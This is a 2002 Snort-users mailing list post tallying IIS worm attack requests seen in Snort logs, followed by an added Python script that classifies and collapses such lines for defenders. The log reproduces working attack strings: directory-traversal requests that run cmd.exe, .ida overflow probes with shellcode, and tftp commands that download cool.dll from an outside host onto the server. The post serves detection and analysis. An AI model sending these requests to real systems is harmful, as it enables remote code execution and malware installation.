[Snort-users] Re-affermentain, Opps, I mean re-affirmation of the morons on the net

Phil Wood cpw at ...440...
Sat Feb 9 19:33:02 EST 2002


56 minutes of snort web rules alerts starting Sat Feb  9 18:52:57 MST.
The leading number is frequency. (sort file | uniq -c | sort -rn).
Check out the moron that is going to pull down cool.dll.
(No, this was not captured on my home machine.)

   6244	GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
   4999	GET /scripts/..%c../winnt/system32/cmd.exe?/c+dir dir HTTP/1.0
   2514	GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir r HTTP/1.0
   1303	GET /scripts/root.exe?/c+dir HTTP/1.0
   1290	GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
   1286	GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
   1279	GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir c+dir HTTP/1.0
   1268	GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir c+dir HTTP/1.0
   1259	GET /msadc/..%5c../..%5c../..%5c/..55../..c1../../.../winnt/system32/cmd.exe?/c+dir 32/cmd.exe?/c+dir HTTP/1.0
   1237	GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir dir HTTP/1.0
   1233	GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir c+dir HTTP/1.0
   1228	GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir r HTTP/1.0
     40	GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0
      4	GET /scripts/..%c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll \httpodbc.dll HTTP/1.0
      4	GET /scripts/..%c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll \httpodbc.dll HTTP/1.0
      4	GET /scripts/..%c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll \httpodbc.dll HTTP/1.0
      2	GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll ttpodbc.dll HTTP/1.0
      2	GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll ttpodbc.dll HTTP/1.0
      2	GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll ttpodbc.dll HTTP/1.0
      2	GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
      1	GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll e:\httpodbc.dll HTTP/1.0
      1	GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll d:\httpodbc.dll HTTP/1.0
      1	GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll c:\httpodbc.dll HTTP/1.0
      1	GET /scripts/root.exe?/c+tftp -i 172.16.102.254 GET cool.dll httpodbc.dll podbc.dll HTTP/1.0
      1	GET /scripts/debug/HM_ScriptDOM.js HTTP/1.1
      1	GET /scripts/debug/HM_ArraysSiteMapLab_sub.js HTTP/1.1
      1	GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll \httpodbc.dll HTTP/1.0
      1	GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll e:\httpodbc.dll HTTP/1.0
      1	GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll \httpodbc.dll HTTP/1.0
      1	GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll d:\httpodbc.dll HTTP/1.0
      1	GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll \httpodbc.dll HTTP/1.0
      1	GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll c:\httpodbc.dll HTTP/1.0
      1	GET /scripts/..%2f../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll ttpodbc.dll HTTP/1.0
      1	GET /scripts/..%2f../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll ttpodbc.dll HTTP/1.0
      1	GET /scripts/..%2f../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll ttpodbc.dll HTTP/1.0
      1	GET /msadc/..%5c../..%5c../..%5c/..55../..c1../../.../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll 0cool.dll%20e:\httpodbc.dll HTTP/1.0
      1	GET /msadc/..%5c../..%5c../..%5c/..55../..c1../../.../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll 0cool.dll%20d:\httpodbc.dll HTTP/1.0
      1	GET /msadc/..%5c../..%5c../..%5c/..55../..c1../../.../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll 0cool.dll%20c:\httpodbc.dll HTTP/1.0
      1	GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll e:\httpodbc.dll HTTP/1.0
      1	GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll d:\httpodbc.dll HTTP/1.0
      1	GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll c:\httpodbc.dll HTTP/1.0
      1	GET /intranet/pitchang_combined/1day/1997-148.html HTTP/1.0
      1	GET /d/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll podbc.dll HTTP/1.0
      1	GET /d/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll podbc.dll HTTP/1.0
      1	GET /d/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll podbc.dll HTTP/1.0
      1	GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
      1	GET /default.ida?
      1	GET /c/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll podbc.dll HTTP/1.0
      1	GET /c/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll podbc.dll HTTP/1.0
      1	GET /c/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll podbc.dll HTTP/1.0
      1	GET /c

Now for another beer.
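
The raw `sort | uniq -c | sort -rn` tally above splits one worm into a dozen lines because every encoding variant of the traversal (`..%5c..`, `..%2f..`, `..%255c..`, `/c/winnt/...`) is a distinct string. The following is an added example, not code from Phil's post or from Snort: it parses request lines of that shape, percent-decodes them repeatedly so double-encoded variants collapse, classifies each request as a `.ida` overflow probe, a `cmd.exe`/`root.exe` command-shell recon (`dir`), or a command-shell request that tries to pull a file with `tftp`, and pulls out the tftp source host and file name so a defender can block the egress and hunt for the dropped DLL. The sample log is constructed for the example (a few lines in the shape of the dump, including one deliberate `%255c` double encoding that the dump itself does not contain); the function names (`normalize_uri`, `classify`, `fetch_target`, `tally`) are the example's own.

```python
"""Tally and classify Snort web alert request lines (added example)."""
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample in the shape of the dump above (not the original capture).
SAMPLE_LOG = r"""
GET /default.ida?NNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801=a HTTP/1.0
GET /default.ida?NNNNNNNNNNNNNNNN HTTP/1.0
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/root.exe?/c+dir HTTP/1.0
GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll HTTP/1.0
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll HTTP/1.0
GET /scripts/debug/HM_ScriptDOM.js HTTP/1.1
GET /intranet/1day/1997-148.html HTTP/1.0
"""

# The URI may contain spaces (the tftp command line is carried verbatim in the
# query), so take the first token as method and the optional last token as the
# HTTP version; everything between is the URI.
REQUEST_RE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<uri>.+?)(?:\s+(?P<version>HTTP/\d\.\d))?$")
TFTP_RE = re.compile(r"tftp\s+-i\s+(?P<host>\S+)\s+get\s+(?P<file>\S+)")


def normalize_uri(uri: str) -> str:
    """Percent-decode until stable (catches %255c double encoding), fold
    backslashes to slashes and lowercase, so encoding variants of the same
    traversal map to one key.  Malformed escapes such as '%c.' are left as-is
    by urllib, which is fine: classification keys on the target binary."""
    decoded = uri
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded.replace("\\", "/").lower()


def classify(uri: str) -> str:
    """Map a request URI to an alert family."""
    path, _, query = normalize_uri(uri).partition("?")
    if path.startswith("/default.ida"):
        # Code Red style .ida overflow probe: long run of N's, %uXXXX payload tail
        return "ida-overflow"
    if path.endswith("/cmd.exe") or path.endswith("/root.exe"):
        # Traversal to the command shell; the query is the command being run
        if TFTP_RE.search(query):
            return "cmd-shell:tftp-fetch"   # trying to pull a file onto the host
        return "cmd-shell:recon"            # e.g. '/c+dir'
    return "other"


def fetch_target(uri: str):
    """For a tftp fetch, return (source host, file name) for blocking/hunting,
    or None if the request is not a tftp fetch."""
    m = TFTP_RE.search(normalize_uri(uri))
    return (m.group("host"), m.group("file")) if m else None


def tally(log_text: str):
    """Return (raw line counter, family counter).  The raw counter is the
    equivalent of 'sort file | uniq -c | sort -rn'; the family counter is the
    collapsed view."""
    raw, families = Counter(), Counter()
    for line in log_text.strip().splitlines():
        line = line.strip()
        m = REQUEST_RE.match(line)
        if not m:
            continue
        raw[line] += 1
        families[classify(m.group("uri"))] += 1
    return raw, families


def top(counter: Counter):
    """Sort like 'sort -rn': highest count first, ties by key."""
    return sorted(counter.items(), key=lambda kv: (-kv[1], kv[0]))


if __name__ == "__main__":
    raw, families = tally(SAMPLE_LOG)
    for key, n in top(families):
        print(f"{n:6d}  {key}")
    for line in SAMPLE_LOG.strip().splitlines():
        target = fetch_target(REQUEST_RE.match(line.strip()).group("uri"))
        if target:
            print("tftp fetch from %s of %s" % target)
```

Running it on the constructed sample prints three command-shell families and the two tftp fetches from 172.16.102.254; on the real dump the same collapse turns roughly fifty raw lines into four families, which is the view you want when deciding whether a host actually executed the `tftp` download rather than just being scanned.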
